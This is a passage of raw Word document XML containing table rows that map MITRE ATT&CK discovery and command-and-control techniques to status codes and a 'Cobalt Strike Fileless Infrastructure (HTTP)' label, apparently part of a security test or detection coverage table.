                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0974BD9E" w14:textId="7005C8AC" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B62325" w14:textId="76C3E0D3" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A6F3468" w14:textId="0D671038" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Cobalt Strike Fileless Infrastructure (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="71410179" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6328E366" w14:textId="0D46B3F2" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A8BD90" w14:textId="4F584E99" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00174443">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E7CFA4F" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9B56A1" w14:textId="0D656C59" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A0E065" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700A8D6A" w14:textId="28F063F9" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41574597" w14:textId="301D51FF" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C15894C" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w14:paraId="512158BF" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E26921" w14:textId="6F3B7157" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E7FFAA" w14:textId="09CC3195" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00174443">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1447ED15" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265F0DAE" w14:textId="489FFB87" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0174E685" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC79426" w14:textId="2F04E4C2" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="000A3FFE" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="279C97E4" w14:textId="383A47DF" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D7BCAD6" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00ED5880" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="551C6EDB" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375F6388" w14:textId="059AFCCF" w:rsidR="007B4DCC" w:rsidRDefault="005D0E9A" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617A3564" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7"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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="285F3298" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6724AEF5" w14:textId="47E7B1D3" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34CA4F47" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C193908" w14:textId="29381A1B" w:rsidR="007B4DCC" w:rsidRPr="001D43D9" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D43D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0558E09F" w14:textId="3E289084" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DADF1A7" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Cobalt Strike Fileless Infrastructure (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="791B5FF5" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6326F10C" w14:textId="4EA14C2F" w:rsidR="007B4DCC" w:rsidRDefault="003F4B3E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67FA476D" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7"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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07931A49" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31641566" w14:textId="25341C14" w:rsidR="007B4DCC" w:rsidRDefault="00954527" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDE7DE2" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B76218C" w14:textId="684E3EB2" w:rsidR="007B4DCC" w:rsidRPr="001D43D9" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D43D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6795AA57" w14:textId="353CDB9D" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B4C5F6" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Cobalt Strike Fileless Infrastructure (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="5185108B" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CE6DC74" w14:textId="696D14EA" w:rsidR="007B4DCC" w:rsidRDefault="004151E8" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA435EA" w14:textId="510784C3" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0AD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0AD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
